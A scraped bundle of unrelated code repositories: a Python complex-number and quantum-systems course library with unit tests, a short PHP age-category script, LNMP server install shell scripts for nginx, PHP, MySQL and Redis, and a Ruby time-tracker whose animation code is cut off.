for x in range(len(vectorc)):
inverse_v[x] = multiplicacion_complejos((-1, 0), vectorc[x])
return inverse_v
def suma_vectorescpx(vectorc_1, vectorc_2):
""" suma de dos vectores complejos
:param vectorc_1: vector complejo
:param vectorc_2: vector complejo
:return: vector suma
:rtype: list
"""
if len(vectorc_1) == len(vectorc_2):
svector = [(0, 0)] * len(vectorc_1)
for x in range(len(vectorc_1)):
svector[x] = (suma_complejos(vectorc_1[x], vectorc_2[x]))
return svector
def potencia_polar(polar1, num):
"""potencia de un numero complejo en representación polar
:param polar1: numero complejo en representacion polar
:type polar1: tuple
:param num: exponente
:return: potencia del numero complejo
:rtype: tuple
"""
potencia_complejo = (round(polar1[0] ** num, 2), round(num * polar1[1], 2))
return potencia_complejo
def division_polar(polar1, polar2):
"""division de dos numeros complejos en representacion polar
:param polar1: numero complejo en representacion polar
:type polar1: tuple
:param polar2: numero complejo en representacion polar
:type polar2: tuple
:return: division entre los numeros complejos en representación polar
:rtype: tuple
"""
complejo_polar = (round(polar1[0] / polar2[0], 2), round(polar1[1] - polar2[1], 2))
return complejo_polar
def multiplicacion_polar(polar1, polar2):
"""multiplicación de dos numeros complejos en representacion polar
:param polar1: numero complejo en representacion polar
:type polar1: tuple
:param polar2: numero complejo en representacion polar
:type polar2: tuple
:return: producto entre los numeros complejos en representación polar
:rtype: tuple
"""
complejo_polar = (round(polar1[0] * polar2[0], 2), round(polar1[1] + polar2[1], 2))
return complejo_polar
def rep_cartesiana(par):
"""representa un numero complejo en representanción cartesiana
:param par: representacion polar de un numero complejo
:type par: tuple
:return: representación cartesiana de un nnumero complejo
:rtype: tuple
"""
complejo = (round(par[0] * math.cos(par[1]), 2), round(par[0] * math.sin(par[1]), 2))
return complejo
def rep_polar(par):
"""representa un numero complejo en una representacion polar
:param par: representacion cartesiana de un numero complejo
:type par: tuple
:return: representacion polar de un numero complejo
:rtype: tuple
"""
p = modulo_complejos(par)
ang = round(math.atan(par[1] / par[0]), 2)
result = (p, ang)
return result
def conjugado_complejos(par):
""" realiza el conjugado de un numero complejo
:param par: representacion de un numero complejo en coordenadas cartesianas
:type par: tuple
:return: el numero complejo conjugado
:rtype: tuple
"""
new_b = par[1] * -1
new_par = (par[0], new_b)
return new_par
def modulo_complejos(par):
""" Realiza el conjugado de un numero complejo
:param par: representación de un numero complejo en coordenadas cartesianas
:type par: tuple
:return: un entero valor del modulo de un numero complejo
:rtype: int
"""
modulo = (par[0] ** 2 + par[1] ** 2)
return round(math.sqrt(modulo), 2)
def division_complejos(par1, par2):
"""
:param par1: representación de un numero complejo en coordenadas cartesianas
:type par1: tuple
:param par2: representación de un numero complejo en coordenadas cartesianas
:type par2: tuple
:return: una lista como representación de el numero complejo resultante de la division
:rtype: tuple
"""
d = (par2[0] ** 2 + par2[1] ** 2)
x = (par1[0] * par2[0] + par1[1] * par2[1]) / d
y = (par2[0] * par1[1] - par1[0] * par2[1]) / d
result = (round(x, 2), round(y, 2))
return result
def resta_complejos(par1, par2):
"""Resta de dos numeros complejos
:param par1: representación de un numero complejo en coordenadas cartesianas
:type par1: tuple
:param par2: representación de un numero complejo en coordenadas cartesianas
:type par2: tuple
:return: una lista como representación de el numero complejo resultante de la resta
:rtype: tuple
"""
result = (round(par1[0] - par2[0], 2), round(par1[1] - par2[1], 2))
return result
def suma_complejos(par1, par2):
"""Suma dos numeros complejos
:param par1: representación de un numero complejo en coordenadas cartesianas
:type par1: tuple
:param par2: representación de un numero complejo en coordenadas cartesianas
:type par2: tuple
:return: una lista como representación de el numero complejo resultante de la suma
:rtype: tuple
"""
result = (round(par1[0] + par2[0], 2), round(par1[1] + par2[1], 2))
return result
def multiplicacion_complejos(par1, par2):
"""Multiplicacion de dos numeros complejos
:param par1: representación de un numero complejo en coordenadas cartesianas
:type par1: tuple
:param par2: representación de un numero complejo en coordenadas cartesianas
:type par2: tuple
:return: una lista como representación de el numero complejo resultante de la multiplicacion
:rtype: tuple
"""
result = (round((par1[0] * par2[0]) - (par1[1] * par2[1]), 2), round((par1[0] * par2[1]) + (par1[1] * par2[0]), 2))
return result
if __name__ == '__main__':
print(modulo_complejos((2, 0)))
<file_sep>/sistemas_cuanticos_cnyt.py
""" Libreria simulación de lo clasico a lo cuantico
<NAME>
CNYT
"""
import math
import Libreria_numeros_complejos as nc
def interferencias(matriz):
"""funcion que regresa las interferencias de un sistema
:param matriz: matriz de un sistema de rendijas
:return: matriz de interferencias
"""
matriz_interfe = []
for i in range(len(matriz)):
for j in range(len(matriz)):
tempo = 0
for k in range(len(matriz[i])):
tempo1 = matriz[i][k] * matriz[k][j] + tempo
if tempo1 == tempo and (matriz[i][j] != 0 or matriz[j][i] != 0):
matriz_interfe += [[i, j]]
return matriz_interfe
def multi_rendijas(matriz, vector, clicks):
""" función que multiplica una matriz por si misma y devuelve el vector estado despues de una cierta cantidad
de clicks
:param matriz: matriz adyacente al sistema
:param vector: vector estado inicial
:param clicks: cantidad de clicks
:return: vector estado despues de los clicks
"""
matriz_prod = nc.multiplicacion_matrices(matriz, matriz)
vector_est = system_clikcs(matriz_prod, vector, clicks)
return vector_est
def probabilistic_ad_matrix(matrix, frac):
""" funcion que permite ingresar fracionarios a las entradas de una matriz booleana
:param matrix: matriz booleana
:param frac: numeros fraccionarios a rremplazar
:return: matriz propabilistica
"""
k = 0
for i in range(len(matrix)):
for j in range(len(matrix[0])):
if matrix[i][j] == 1:
matrix[i][j] = frac[k]
k += 1
return matrix
def Boolean_ad_matrix(first_vertex, mov_vertex):
"""crea una matriz adyacente booleana
:param first_vertex: vertices iniciales
:param mov_vertex: vertices a donde llegan los vertices iniciales
:return:matriz adyacente booleana
"""
matriz_ad = [[(0, 0) for j in range(len(first_vertex))] for i in range(len(mov_vertex))]
for i in range(len(first_vertex)):
for j in range(len(mov_vertex)):
if i == j:
matriz_ad[mov_vertex[j]][first_vertex[i]] = (1,0)
return matriz_ad
def system_clikcs(matriz_ad, vector, number):
"""determina el vector estado despues de una cierta cantidad de clicks
:param matriz_ad: matriz adyacente al sistema
:param vector: vector estado
:param number: cantidad de clikcs
:return: vector estado despues de number clicks
"""
i = 0
while i < number:
vector_cl = nc.accionmatriz_vector(matriz_ad, vector)
vector = vector_cl
i += 1
return vector
<file_sep>/probadorTeoria.py
import math
import unittest
import TeoriaQ as tq
class theory_test(unittest.TestCase):
def test_pp(self):
self.assertEqual(tq.prob_position(2, [(-3, -1), (0, -2), (0, 1), (2, 0)]), 0.053)
def test_amt(self):
self.assertEqual(
tq.amplitud_tran([(-1, -4), (2, -3), (-7, 6), (-1, 1), (-5, -3), (5, 0), (5, 8), (4, -4), (8, -7), (2, -7)],
[(2, 1), (-1, 2), (0, 1), (1, 0), (3, -1), (2, 0), (0, -2), (-2, 1), (1, -3), (0, -1)]),
(-3, 19))
def test_esvalue(self):
self.assertEqual(
tq.expected_value([[(1, 0), (0, -1)], [(0, 1), (2, 0)]], [(math.sqrt(2) / 2, 0), (0, math.sqrt(2) / 2)]),
(2.5, 0))
def test_mediavar(self):
self.assertEqual(
tq.mediaandvar([[(1, 0), (0, -1)], [(0, 1), (2, 0)]], [(math.sqrt(2) / 2, 0), (0, math.sqrt(2) / 2)]),
([[(0.0, 1.0), (-0.5, 0.0)], [(0.0, 1.0), (-0.5, 0.0)]], (1.2, 0)))
def test_441(self):
self.assertEqual(
tq.cuatro1([[(0, 0), (1, 0)], [(1, 0), (0, 0)]], [[(math.sqrt(2)/2, 0), (math.sqrt(2)/2, 0)],
[(math.sqrt(2)/2, 0),
(-math.sqrt(2)/2, 0)]]), True)
if __name__ == "__main__":
unittest.main()
<file_sep>/README.md
# Salto de lo calsico a lo cuantico
simulación aproximada de sistemas cuanticos.
uso de obvserbables, medidas.
solución de los ejercicios 4.41 y 4.4.2.
probador de la libreria añadido.
<file_sep>/TeoriaQ.py
"""PRACTICA DE LA TEORIA CUANTICA
<NAME>
CNYT
"""
import sistemas_cuanticos_cnyt as sc
import Libreria_numeros_complejos as nc
import math
import numpy as np
def cuatro2(biliar_matriz, ket, num):
"""resolucion del ejercicio 4.4.2
:param biliar_matriz: matriz adyacent a la bola de billar
:param ket: estado inicial
"""
solution = sc.system_clikcs(biliar_matriz, ket, num)
return solution
def cuatro1(matriz1, matriz2):
"""Resolucion del porblema 4.4.1
:param matriz1: posible matriz unitaria
:param matriz2: posible matriz unitaria
:return: un booleano
"""
if nc.unitaria(matriz1) and nc.unitaria(matriz2):
product = nc.multiplicacion_matrices(matriz1, matriz2)
if nc.unitaria(product):
return True
return False
def eingenvalues_vectors(matriz_ob):
"""funcion que calcula los valores y vectores propios de una matriz
:param matriz_ob: observable
:return: valores propios y vectores propios
"""
matriz = np.array(matriz_ob)
eingenvalues, eingenvectors = np.linalg.eig(matriz)
return eingenvalues, eingenvectors
def generador_idn(matriz):
"""funcion que genera una matriz identidad
:param matriz: lista en 2D
:return: matriz identidad
"""
midentidad = [[(0, 0) for j in range(len(matriz))] for i in range(len(matriz))]
for i in range(len(midentidad)):
for j in range(len(midentidad[0])):
if i == j:
midentidad[i][j] = (1, 0)
print(midentidad)
return midentidad
def mediaandvar(matriz_ob, estado):
"""Calcula la media y la varianza del observable en el estado dado
:param matriz_ob: observavle
:param estado: estado preparado
:return: media y variancia
"""
es_value = expected_value(matriz_ob, estado)
if observables(matriz_ob):
midentidad = generador_idn(matriz_ob)
restador = nc.multiescalar_matrix(es_value, midentidad)
restador = nc.inversa_add_matrizc(restador)
delta = nc.suma_matricesc(matriz_ob, restador)
delta_multi = nc.multiplicacion_matrices(delta, delta)
variancia = expected_value(delta_multi, estado)
return delta, variancia
def expected_value(matriz_ob, estado):
"""calcula el valor esperado despues de medir el sistema varias veces
:param matriz_ob: observable
:param estado: estado preparado
:return: valor esperado
"""
first_part = nc.accionmatriz_vector(matriz_ob, estado)
value = nc.int_product(estado, first_part)
m_value = nc.modulo_complejos(value)
return (round(m_value, 1), 0)
def observables(matriz_ob):
""" funcion que revisa si el observable ingresado es una matriz hermitiana
:param matriz_ob: matriz posiblemente hermitiana
:return: Booleana
"""
return nc.hermitiana(matriz_ob)
def amplitud_tran(ket, ket1):
""" función que calcula la amplitud de transcición
:param ket: vector estado 1
:param ket1: vector estado 2
:return: amplitud de transición
"""
transision = nc.int_product(ket1, ket)
return transision
def prob_position(p, ket):
""" función que determina la probabilidad de enccontrar una particula en una posición dada
:param p: posición
:param ket: vector estado
:return: probabilidad
"""
posisition_value = nc.modulo_complejos(ket[p]) ** 2
magnitud_ket = 0
for i in range(len(ket)):
magnitud_ket += nc.modulo_complejos(ket[i]) ** 2
magnitud_ket = math.sqrt(magnitud_ket)
probabilidad = posisition_value / magnitud_ket ** 2
return round(probabilidad, 3)
| 9cdb2cb3af988dc79f5a2d4fe7ac9b43c5fb502a | [
"Markdown",
"Python"
] | 5 | Python | santiforero1018/clasic_to_quantyc | b189668ca0024ec4c7ec0e94022f5d344cb99dc6 | 91ce554f372c1fba6c7466f7ad8e81a9489d5ce6 |
refs/heads/master | <repo_name>Leandrolara2/php-aula--introdu-o<file_sep>/index.php
<?php
$categorias = [];
$categorias[] = 'infantil';
$categorias[] = 'adolecente';
$categorias[] = 'adulto';
$categorias[] = 'idoso';
//print_r($categorias);
$nome = 'Eduardo';
$idade = 90;
//var_dump($nome);
//var_dump($idade);
if($idade >= 0 && $idade <=12)
{
echo 'infatil';
}
else if($idade >= 13 && $idade <=17)
{
echo 'adolecente';
}
else if($idade >= 18 && $idade <=59)
{
echo 'adulto';
}
else
{
echo 'idoso';
} | b2f50ee4725a19e905fe463b5f802d2bf89b7636 | [
"PHP"
] | 1 | PHP | Leandrolara2/php-aula--introdu-o | d72f8ee3c2a39ebe920b0309096a92632f9f3dd9 | 8dd2d877155c5d3e75d4f1737b3f27f36a6e5a4c |
refs/heads/master | <repo_name>AntiIO/lnmp<file_sep>/lnmp安装/软件安装/mysql安装/mysql_server_install.sh
#!/bin/sh
#安装bison
echo "正在安装bison******************"
cd /usr/local/src
wget ftp://ftp.gnu.org/gnu/bison/bison-3.0.4.tar.gz
tar xf bison-3.0.4.tar.gz
cd bison-3.0.4
./configure
make && make install
#安装ncurses
echo "正在安装ncurses******************"
cd /usr/local/src
wget ftp://ftp.gnu.org/gnu/ncurses/ncurses-6.0.tar.gz
tar xf ncurses-6.0.tar.gz
cd ncurses-6.0
./configure
make && make install
#安装CMAKE
echo "正在安装CMAKE******************"
cd /usr/local/src
wget https://cmake.org/files/v3.3/cmake-3.3.2.tar.gz
tar xf cmake-3.3.2.tar.gz
cd cmake-3.3.2
./configure
gmake && make install
#安装mysql
echo "正在安装mysql******************"
cd /root/download/
tar xf mysql-5.6.17.tar.gz
cd mysql-5.6.17
cmake ./ -DCMAKE_INSTALL_PREFIX=/usr/local/mysql -DMYSQL_DATADIR=/usr/local/mysql/data -DDOWNLOAD_BOOST=1 -DWITH_BOOST=/usr/local/src/boost
make && make install
#添加用户和用户组
echo "正在添加用户和用户组******************"
groupadd mysql
useradd mysql -g mysql -M -s /sbin/nologin
#增加一个名为CentOS Mysql的用户。
#-g:指定新用户所属的用户组(group)
#-M:不建立根目录
#-s:定义其使用的shell,/sbin/nologin代表用户不能登录系统。
#初始化数据库
echo "正在初始化数据库******************"
cd /usr/local/mysql
chown -R mysql:mysql . #(为了安全安装完成后请修改权限给root用户)
scripts/mysql_install_db --user=mysql #(先进行这一步再做如下权限的修改)
chown -R root:mysql . #(将权限设置给root用户,并设置给mysql组, 取消其他用户的读写执行权限,仅留给mysql "rx"读执行权限,其他用户无任何权限)
chown -R mysql:mysql ./data #(给数据库存放目录设置成mysql用户mysql组,并赋予chmod -R ug+rwx 读写执行权限,其他用户权限一律删除仅给mysql用户权限)
#配置文件和启动脚本
echo "正在配置mysql******************"
cp support-files/my-default.cnf /etc/my.cnf #(并给/etc/my.cnf +x权限 同时删除 其他用户的写权限,仅仅留给root 和工作组 rx权限,其他一律删除连rx权限都删除)
#将mysql的启动服务添加到系统服务中
cp support-files/mysql.server /etc/init.d/mysql
chmod +x /etc/init.d/mysql
#让mysql服务开机启动
chkconfig --add mysql
#启动mysql
service mysql start
#修改mysql root登录的密码(mysql必须先启动了才行哦)
cd /usr/local/mysql
#################################
#mysql5.7以后的版本修改密码的方法
#mysql> use mysql
#Database changed
#mysql> update user set authentication_string=password("<PASSWORD>") where user="root" and Host="localhost";
#################################
./bin/mysqladmin -u root password '<PASSWORD>'
#./bin/mysqladmin -u root -h web-mysql password '<PASSWORD>' #没执行成功。
#如mysql需要远程访问,还要配置防火墙开启3306端口
/etc/sysconfig/iptables
#/sbin/iptables -A INPUT m state --state NEW m tcp p dport 3306 j ACCEPT
/sbin/iptables -I INPUT -p tcp --dport 3306 -j ACCEPT
service iptables restart
#还要配置数据库中的用户权限,准许远程登录访问。
#删除密码为空的用户
delete from user where password="";
#准许root用户远程登录
update user set host = '%' where user = 'root';
#重启mysql生效
/etc/init.d/mysql restart
boost安装
-- BOOST_INCLUDE_DIR /usr/local/include
-- LOCAL_BOOST_DIR
-- LOCAL_BOOST_ZIP
-- Could not find (the correct version of) boost.
-- MySQL currently requires boost_1_59_0<file_sep>/lnmp安装/nginx_install.sh
##############################################
## nginx1.4.5安装脚本
## 云更新web组(liuhui05)
#############################################
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
# Check if user is root
if [ $(id -u) != "0" ]; then
echo "Error: You must be root to run this script, please use root to install this shell script"
exit 1
fi
mkdir -p /var/log/nginx
chown www.www /var/log/nginx
mkdir -p /root/download
cd /root/download
yum -y install pcre-devel zlib zlib-devel openssl openssl-devel
groupadd www
useradd -s /sbin/nologin -g www www
ulimit -SHn 65535
ldconfig
wget http://nginx.org/download/nginx-1.9.6.tar.gz
tar zxvf nginx-1.9.6.tar.gz
cd nginx-1.9.6/
./configure --user=www --group=www --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_ssl_module --with-http_gzip_static_module --with-pcre
make && make install
cd ../
#wget -c "http://wiki.nginx.org/index.php?title=RedHatNginxInitScript&action=raw&anchor=nginx" -O init.d.nginx
#cp init.d.nginx /etc/init.d/nginx
#chmod +x /etc/init.d/nginx
#需要手动配置下/etc/init.d/nginx
#chkconfig --add nginx
#chkconfig nginx on
#/etc/init.d/nginx start
/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT
#ps aux |grep nginx<file_sep>/README.md
lnmp
====
linux下面运维环境学习
<file_sep>/lnmp安装/centos_install.sh
#############################################################
## CentOS-6.5-x86_64-minimal初始安装后,常用工具命令安装。
## 云更新web组(liuhui05)
#############################################################
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
# Check if user is root
if [ $(id -u) != "0" ]; then
echo "Error: You must be root to run this script, please use root to install this shell script"
exit 1
fi
yum -y install wget gcc gcc-c++ lrzsz ntp unzip
#同步时间
cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
ntpdate us.pool.ntp.org<file_sep>/lnmp安装/php-etc/php.d/03-imagick.ini
extension=imagick.so
<file_sep>/lnmp安装/软件安装/mysql安装/mysql_client_install.sh
#!/bin/sh
#安装bison
echo "正在安装bison******************"
cd /root/download/
tar xf bison-3.0.tar.gz
cd bison-3.0
./configure
make && make install
echo "bison安装成功******************"
#安装ncurses
echo "*********************************"
echo "*********************************"
echo "正在安装ncurses******************"
echo "*********************************"
echo "*********************************"
cd /root/download/
tar xf ncurses-5.8.tar.gz
cd ncurses-5.8
./configure
make && make install
echo "ncurses安装成功******************"
#安装CMAKE
echo "CMAKE安装成功******************"
cd /root/download/
tar xf cmake-2.8.12.2.tar.gz
cd cmake-2.8.12.2
./configure
gmake && make install
#安装mysql
echo "正在安装mysql******************"
cd /root/download/
tar xf mysql-5.6.17.tar.gz
cd mysql-5.6.17
cmake ./ -DWITHOUT_SERVER=ON -DCMAKE_INSTALL_PREFIX=/usr/local/mysql -Wno-dev
make && make install
echo "bison安装成功******************"
#安装mysql扩展
echo "正在安装php-mysql扩展******************"
cd /usr/local/src/php-5.4.25/ext/mysql/
/usr/local/php-5.4.25/bin/phpize
./configure --with-php-config=/usr/local/php-5.4.25/bin/php-config --with-mysql=/usr/local/mysql
make && make install
echo "php-mysql扩展安装成功******************"
echo "请手动修改php.ini配置文件,加载mysql.so,重启php-fpm"<file_sep>/lnmp安装/php_install.sh
##############################################
## php5.4.25安装脚本,以及sql server的php安装
## 云更新web组(liuhui05)
#############################################
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
# Check if user is root
if [ $(id -u) != "0" ]; then
echo "Error: You must be root to run this script, please use root to install this shell script"
exit 1
fi
mkdir -p /usr/local/php
#安装基础库
yum -y install libxml2 libxml2-devel curl-devel libjpeg-devel libpng-devel
#安装libmcrypt
cd /usr/local/src
wget ftp://mcrypt.hellug.gr/pub/crypto/mcrypt/attic/libmcrypt/libmcrypt-2.5.7.tar.gz
tar -zxvf libmcrypt-2.5.7.tar.gz
cd libmcrypt-2.5.7
./configure
make && make install
####################################
## 安装php-5.4.25
####################################
cd /usr/local/src
wget http://cn2.php.net/distributions/php-5.4.25.tar.gz
tar zvxf php-5.4.25.tar.gz
cd php-5.4.25
./configure --prefix=/usr/local/php-5.4.25 --with-config-file-path=/usr/local/php-5.4.25/etc --with-mysql=mysqlnd --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd --with-gd --with-iconv --with-zlib --enable-xml --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curlwrappers --enable-mbregex --enable-fpm --enable-mbstring --enable-ftp --enable-gd-native-ttf --with-openssl --enable-pcntl --enable-sockets --with-xmlrpc --enable-zip --enable-soap --without-pear --with-gettext --enable-session --with-mcrypt --with-curl
make #编译
make install #安装
cp /usr/local/src/php-5.4.25/php.ini-production /usr/local/php-5.4.25/etc/php.ini
cp /usr/local/php-5.4.25/etc/php-fpm.conf.default /usr/local/php-5.4.25/etc/php-fpm.conf
cp /usr/local/src/php-5.4.25/sapi/fpm/init.d.php-fpm.in /etc/init.d/php-fpm
chmod +x /etc/init.d/php-fpm #添加执行权限
#需要手动配置下/etc/init.d/php-fpm
#需要手动配置下/usr/local/php-5.4.25/etc/php-fpm.conf
#需要手动配置下/usr/local/php-5.4.25/etc/php.ini
#chkconfig --add php-fpm
#chkconfig php-fpm on
####################################
## 安装sql server的php驱动
####################################
cd /usr/local/src
wget ftp://ftp.freetds.org/pub/freetds/stable/freetds-stable.tgz
tar zxvf freetds-stable.tgz
cd freetds-0.91/
./configure --prefix=/usr/local/freetds --enable-msdblib
make && make install
touch /usr/local/freetds/include/tds.h
touch /usr/local/freetds/lib/libtds.a
#配置/usr/local/freetds/etc/freetds.conf文件
cd /usr/local/src/php-5.4.25/ext/mssql/
/usr/local/php-5.4.25/bin/phpize
./configure --with-php-config=/usr/local/php-5.4.25/bin/php-config --with-mssql=/usr/local/freetds
make && make install
#修改php.ini,加载mssql.so
./configure --prefix=/usr/local/php --with-config-file-path=/usr/local/php/etc --with-mysql=mysqlnd --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd --with-gd --with-iconv --with-zlib --enable-xml --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curlwrappers --enable-mbregex --enable-fpm --enable-mbstring --enable-ftp --enable-gd-native-ttf --with-openssl --enable-pcntl --enable-sockets --with-xmlrpc --enable-zip --enable-soap --without-pear --with-gettext --enable-session --with-mcrypt --with-curl
php7的redis扩展安装:
creating redis.la
(cd .libs && rm -f redis.la && ln -s ../redis.la redis.la)
/bin/sh /usr/local/src/phpredis-php7/libtool --mode=install cp ./redis.la /usr/local/src/phpredis-php7/modules
cp ./.libs/redis.so /usr/local/src/phpredis-php7/modules/redis.so
cp ./.libs/redis.lai /usr/local/src/phpredis-php7/modules/redis.la
PATH="$PATH:/sbin" ldconfig -n /usr/local/src/phpredis-php7/modules
----------------------------------------------------------------------
Libraries have been installed in:
/usr/local/src/phpredis-php7/modules
If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
- add LIBDIR to the `LD_LIBRARY_PATH' environment variable
during execution
- add LIBDIR to the `LD_RUN_PATH' environment variable
during linking
- use the `-Wl,--rpath -Wl,LIBDIR' linker flag
- have your system administrator add LIBDIR to `/etc/ld.so.conf'
See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------
Build complete.
Don't forget to run 'make test'.
Installing shared extensions: /usr/local/php/lib/php/extensions/no-debug-non-zts-20151012/<file_sep>/lnmp安装/lnmp_install.sh
#软件版本号
nginx_version="nginx-quic"
php_version="php-7.4.10"
#软件下载地址
nginx_download_url="http://hg.nginx.org/nginx-quic/archive/tip.tar.gz"
php_download_url="https://github.com/php/php-src/archive/php-7.4.10.tar.gz"
#软件安装地址
nginx_install_path="/usr/local/nginx"
php_install_path="/usr/local/php"
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
# Check if user is root
if [ $(id -u) != "0" ]; then
echo "Error: 请用root权限运行脚本"
exit 1
fi
echo "创建相关目录"
mkdir -p $nginx_install_path
mkdir -p $php_install_path
mkdir -p /root/src
rm -rf /usr/local/nginx
rm -rf /usr/local/php
echo "安装依赖及工具"
rpm -ivh http://mirrors.wlnmp.com/centos/wlnmp-release-centos.noarch.rpm
yum -y install git wget cmake gcc gcc-c++ wntp lrzsz unzip libunwind-devel golang pcre-devel
#同步时间
echo "同步系统时间"
cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
ntpdate us.pool.ntp.org
echo "创建相关用户"
groupadd www
useradd -s /sbin/nologin -g www www
echo "下载相关软件包"
cd /root/src
[ ! -f tip.tar.gz ] && wget $nginx_download_url
[ ! -f php-7.4.10.tar.gz ] && wget $php_download_url
echo "编译boringssl密码库"
export GOPROXY=https://goproxy.io
export GO111MODULE=on
[ ! -d /root/src/boringssl ] && git clone https://github.com/google/boringssl.git
cd boringssl
mkdir -p build .openssl/lib .openssl/include
ln -sf /root/src/boringssl/include/openssl /root/src/boringssl/.openssl/include/openssl
touch /root/src/boringssl/.openssl/include/openssl/ssl.h
cmake -B/root/src/boringssl/build -H/root/src/boringssl
make -C /root/src/boringssl/build
cp /root/src/boringssl/build/crypto/libcrypto.a /root/src/boringssl/build/ssl/libssl.a /root/src/boringssl/.openssl/lib
echo "下载nginx第三方库"
cd /root/src
[ ! -d /root/src/zlib-cf ] && git clone https://gitee.com/zach/zlib.git zlib-cf
cd zlib-cf
make -f Makefile.in distclean
cd /root/src
[ ! -d /root/src/ngx_brotli ] && git clone https://gitee.com/zach/ngx_brotli.git
cd ngx_brotli
git submodule update --init --recursive
cd /root/src
echo "开始安装nginx..........."
echo
chown www.www /var/log/nginx
[ ! -d /root/src/nginx-quic-* ] && tar zxvf tip.tar.gz
cd nginx-quic-*/
sed -i 's@CFLAGS="$CFLAGS -g"@#CFLAGS="$CFLAGS -g"@' auto/cc/gcc
./auto/configure --prefix=/usr/local/nginx --user=www --group=www --with-http_stub_status_module --with-http_v2_module --with-http_ssl_module --with-http_gzip_static_module --with-http_realip_module --with-http_flv_module --with-http_mp4_module --with-pcre --with-pcre-jit --with-zlib=../zlib-cf --add-module=../ngx_brotli --with-ld-opt='-ljemalloc' --with-debug --with-http_v3_module --with-cc-opt="-I../boringssl/include" --with-ld-opt="-L../boringssl/build/ssl -L../boringssl/build/crypto" --with-http_quic_module --with-stream_quic_module
make && make install
cd /root/src
mv /usr/local/nginx/conf /usr/local/nginx/conf.bak
cp -r nginx-conf /usr/local/nginx/conf
cp nginx.service /lib/systemd/system/
chmod +x /lib/systemd/system/nginx.service
systemctl enable nginx
mkdir -p /data/wwwlogs/
mkdir -p /data/wwwlogs/
mkdir -p /data/wwwroot/default
mkdir -p /usr/local/nginx/conf/vhost
touch /data/wwwlogs/access_nginx.log
systemctl start nginx
echo "nginx安装完成"
echo "预备安装PHP"
#安装基础库
yum install autoconf automake bison libxml2 libxml2 openssl-devel sqlite-devel libcurl-devel libpng-devel libjpeg-devel freetype-devel libicu-devel libsodium-devel argon2 libargon2-devel libxslt-devel libzip-devel
dnf --enablerepo=PowerTools install oniguruma-devel
yum -y install git automake gcc gcc-c++ libtool
cd /root/src
#安装re2c
[ ! -d /root/src/re2c ] git clone https://github.com/skvadrik/re2c.git re2c
cd re2c
mkdir -p m4
./autogen.sh && ./configure
make && make install
cd /root/src
[ ! -d /root/src/php-src-php-7.4.10 ] tar zvxf php-7.4.10.tar.gz
cd php-src-php-7.4.10
./buildconf --force
./configure --prefix=/usr/local/php \
--with-config-file-path=/usr/local/php/etc \
--with-config-file-scan-dir=/usr/local/php/etc/php.d \
--with-fpm-user=www \
--with-fpm-group=www \
--enable-mbstring \
--enable-ftp \
--enable-gd \
--enable-opcache \
--enable-gd-jis-conv \
--enable-mysqlnd \
--enable-pdo \
--enable-sockets \
--enable-fpm \
--enable-xml \
--enable-soap \
--enable-pcntl \
--enable-cli \
--with-freetype \
--with-jpeg \
--with-openssl \
--with-mysqli=mysqlnd \
--with-pdo-mysql=mysqlnd \
--with-pear \
--with-zlib \
--with-iconv \
--with-curl \
--enable-bcmath \
--enable-shmop \
--enable-exif \
--enable-sysvsem \
--enable-mbregex \
--with-password-argon2 \
--with-sodium=/usr/local \
--with-mhash \
--enable-ftp \
--enable-intl \
--with-xsl \
--with-gettext \
--with-zip \
--disable-debug \
PKG_CONFIG_PATH=/usr/local/lib/pkgconfig/:
make && make install
mv /usr/local/php/etc /usr/local/php/etc.bak
cp -r php-etc /usr/local/php/etc
cp php-fpm.service /lib/systemd/system/
chmod +x /lib/systemd/system/php-fpm.service
systemctl enable php-fpm.service
service php-fpm status
echo "PHP安装完成"
<file_sep>/lnmp安装/软件安装/redis安装/redis_bench.sh
#!/bin/bash
#最小的并发数
minC=5000
c=0
for ((i=0;i<1;i++))
do
let "c = $minC + $i*1000"
echo
echo "redis-benchmark -h 192.168.1.240 -p 6379 -n 200000 -c $c -q"
redis-benchmark -h 192.168.1.240 -p 6379 -n 200000 -c $c -q
echo
#echo $c
done
| 4bb5a4b93ff4ccce4d797614294bdca7348ec52e | [
"Markdown",
"INI",
"Shell"
] | 9 | Shell | AntiIO/lnmp | b2fcbce72e6b74091a527bb096439d8983d8b677 | 4185614ebb06e7c2de4552a4e5c98d46636c6571 |
refs/heads/master | <file_sep>require 'fileutils'
require 'date'
require './animations'
require './tracker_functions'
Tracker.new.setup
Tracker.new.startup
Animation.new.startup_animation
Tracker.new.run
Tracker.new.shutdown
Animation.new.shutdown_animation<file_sep>class Animation
def startup_animation
print "LET'S"
sleep 0.3
print "\r"
print "LET'S START"
sleep 0.3
print "\r"
print "LET'S START TRACKING"
sleep 0.3
print "\r"
print "LET'S START TRACKING SOME"
sleep 0.3
print "\r"
print "LET'S START TRACKING SOME TIME"
sleep 0.3
print "\r"
print "LET'S START TRACKING SOME TIME MOTHER"
sleep 0.3
print "\r"
print "LET'S START TRACKING SOME TIME MOTHERFUCKER"
sleep 1
print "\n"
end
def shutdown_animation
print "G"
sleep 0.1
print "\r"
print "GO"
sleep 0.1
print "\r"
print "GOO"
sleep 0.1
print "\r"
print "GOOD"
sleep 0.1
print "\r"
print "GOODB"
sleep 0.1
print "\r"
print "GOODBY"
sleep 0.1
print "\r"
print "GOODBYE"
sleep 0.1
print "\r"
print "GOODBYE."
sleep 1
print "\n"
end
def test_animation
print "T"
sleep 0.1
print "\r"
print "TE"
sleep 0.1
print "\r"
